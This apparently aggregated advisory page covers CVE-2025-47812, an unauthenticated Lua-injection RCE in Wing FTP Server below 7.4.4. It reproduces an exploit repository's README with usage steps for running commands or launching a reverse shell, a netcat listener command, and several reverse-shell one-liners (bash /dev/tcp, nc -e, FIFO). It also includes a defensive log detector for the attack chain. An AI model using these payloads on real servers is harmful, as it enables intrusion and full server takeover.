Wing FTP Server Remote Code Execution (RCE)

Vulnerability information

Vulnerability name: Wing FTP Server Remote Code Execution (RCE)

Vulnerability ID:

  • CVE: CVE-2025-47812

Vulnerability type: command execution

Severity: critical

Vulnerability description: Wing FTP Server is a widely used FTP server that supports multiple operating systems and is commonly deployed for enterprise file transfer. Because of its ease of use and feature set, it is found across many industries. CVE-2025-47812 is an unauthenticated remote code execution vulnerability: an attacker can use it to execute arbitrary commands on the target server or open a reverse shell without any authentication. The technical root cause is a defect in how the Wing FTP Server web interface handles null bytes (%00) in the login form (/loginok.html), which lets an attacker inject Lua code into session files. When endpoints such as /dir.html are accessed, these session files are evaluated and the injected malicious code runs. The impact is extremely severe: an attacker can take full control of the affected server, execute arbitrary system commands, steal sensitive data, and even use the server as a pivot for further attacks on the network. Because exploitation requires no authentication and can be automated, the risk is very high. All Wing FTP Server users are advised to upgrade to 7.4.4 or later immediately to fix this vulnerability.

Vendor: Wing FTP Server

Product name: Wing FTP Server

Affected versions: < 7.4.4

Source: https://github.com/blindma1den/CVE-2025-47812

Type: CVE-2025:github search

Repository files

  • README.md
  • exploit.py

Source overview

===========================================================

CVE-2025-47812 - Wing FTP Server Remote Code Execution (RCE)

===========================================================

Author: blindma1den

Date: July 2025

Exploit Type: Remote Code Execution (Unauthenticated)

Target: Wing FTP Server < 7.4.4

CVSS Score: 10.0 (Critical)


DESCRIPTION

This script exploits CVE-2025-47812, a critical vulnerability
in Wing FTP Server’s web interface that allows remote attackers
to execute arbitrary system commands or open a reverse shell
without authentication.

The flaw is caused by improper handling of null bytes (%00)
in the login form (/loginok.html). This allows Lua code
injection into session files, which are later evaluated
when endpoints like /dir.html are accessed.
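The two-step chain described above (a null byte in a /loginok.html form field, followed by a visit to /dir.html that evaluates the poisoned session file) is something a defender can look for in proxy, WAF or application logs while the 7.4.4 upgrade is rolled out. The following detector is an added example written for this page; it is not part of the blindma1den repository or of Wing FTP Server. It assumes request records are available as dictionaries with a source address, path and decoded form parameters; the record layout and the sample records are constructed for the demo.

```python
"""
Defensive helpers for CVE-2025-47812 (Wing FTP Server < 7.4.4).

Added example, not code from the exploit repository or the vendor.
Assumption: a proxy/WAF/application log yields one dict per request with
"ts", "src", "method", "path" and "params" (form fields as strings).
"""
import re
from typing import Iterable, List, Dict
from urllib.parse import unquote

# First fixed release named in the advisory text above.
PATCHED_VERSION = (7, 4, 4)


def parse_version(text: str) -> tuple:
    """Turn '7.4.3' into (7, 4, 3); non-numeric fragments are ignored."""
    return tuple(int(p) for p in re.findall(r"\d+", text))


def is_vulnerable_version(text: str) -> bool:
    """True for any release older than the 7.4.4 fix ('7.4' pads to 7.4.0)."""
    v = (parse_version(text) + (0, 0, 0))[:3]
    return v < PATCHED_VERSION


def contains_null_byte(value: str) -> bool:
    """Detect a NUL in a form field: raw, percent-encoded (%00) or
    double-encoded (%2500), since logs may store fields at any stage of decoding."""
    if "\x00" in value:
        return True
    decoded = value
    for _ in range(2):  # first pass catches %00, second pass catches %2500
        decoded = unquote(decoded)
        if "\x00" in decoded:
            return True
    return False


def analyze(records: Iterable[Dict]) -> List[Dict]:
    """Flag null-byte logins (high) and escalate to critical when the same
    source later requests /dir.html, the endpoint that evaluates session files."""
    findings = []
    suspects = set()  # sources that sent a null-byte login
    for r in sorted(records, key=lambda r: r["ts"]):
        if r["path"] == "/loginok.html":
            bad = sorted(k for k, v in r["params"].items() if contains_null_byte(v))
            if bad:
                suspects.add(r["src"])
                findings.append({"src": r["src"], "ts": r["ts"], "severity": "high",
                                 "reason": "null byte in login field(s) %s" % ",".join(bad)})
        elif r["path"] == "/dir.html" and r["src"] in suspects:
            findings.append({"src": r["src"], "ts": r["ts"], "severity": "critical",
                             "reason": "/dir.html requested after null-byte login"})
    return findings


# Constructed sample records (hypothetical addresses from RFC 5737 ranges).
SAMPLE_RECORDS = [
    {"ts": 1, "src": "10.0.0.5", "method": "POST", "path": "/loginok.html",
     "params": {"username": "alice", "password": "s3cret"}},
    {"ts": 2, "src": "10.0.0.5", "method": "GET", "path": "/dir.html", "params": {}},
    {"ts": 3, "src": "198.51.100.7", "method": "POST", "path": "/loginok.html",
     "params": {"username": "anonymous%00", "password": "x"}},
    {"ts": 4, "src": "198.51.100.7", "method": "GET", "path": "/dir.html", "params": {}},
    {"ts": 5, "src": "203.0.113.9", "method": "POST", "path": "/loginok.html",
     "params": {"username": "bob%2500", "password": "x"}},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_RECORDS):
        print("%-8s %-14s ts=%d %s" % (f["severity"], f["src"], f["ts"], f["reason"]))
    for ver in ("7.4.3", "7.4.4", "7.5.0"):
        print(ver, "vulnerable" if is_vulnerable_version(ver) else "patched")
```

The normal login from 10.0.0.5 produces nothing; 198.51.100.7 yields a high finding for the login and a critical one when it hits /dir.html; 203.0.113.9 is caught only because the field is decoded twice. Treat a critical finding as a reason to inspect the server's session files and to confirm the installed version with is_vulnerable_version.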


SOURCES

NVD Description: https://nvd.nist.gov/vuln/detail/CVE-2025-47812


FEATURES

  • Command execution (e.g., whoami, uname -a)
  • Multiple reverse shell payloads
  • Extracts UID session cookie automatically
  • Clean modular Python 3 implementation

REQUIREMENTS

  • Python 3.7+
  • requests module

Install dependencies:

pip install requests

USAGE

Run the script:

python3 wingftp_rce_exploit.py

You will be prompted for:

  • Target URL (e.g., http://127.0.0.1:5466)
  • Username (default: anonymous)
  • Exploit mode:
    [1] Run a command
    [2] Launch reverse shell

EXAMPLES

[1] RUN COMMAND:

Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 1
Command to execute (default: whoami): whoami

[2] REVERSE SHELL:

Target URL: http://192.168.1.10:5466
Username: anonymous
Your choice (1 or 2): 2
Reverse shell IP address: 192.168.1.100
Reverse shell port: 4444

Start your listener before triggering the shell:

nc -lvnp 4444

PAYLOADS USED (REVERSE SHELL)

Bash:
bash -i >& /dev/tcp/IP/PORT 0>&1

Python3:
python3 -c 'import socket,subprocess,os; …'

Netcat:
nc IP PORT -e /bin/sh

PHP:
php -r '$sock=fsockopen("IP",PORT); …'

FIFO + Netcat:
rm /tmp/f; mkfifo /tmp/f; cat /tmp/f|/bin/sh -i …


DISCLAIMER

This code is for educational purposes only. Do NOT use
this exploit against systems you do not own or have explicit
authorization to test. Unauthorized use is illegal and unethical.

Patch your systems immediately. Wing FTP Server 7.4.4 resolves
this vulnerability.

Happy hacking!


Page URL: http://example.com/2025/07/17/github_565169772/
Author: lianccc
Published: 17 July 2025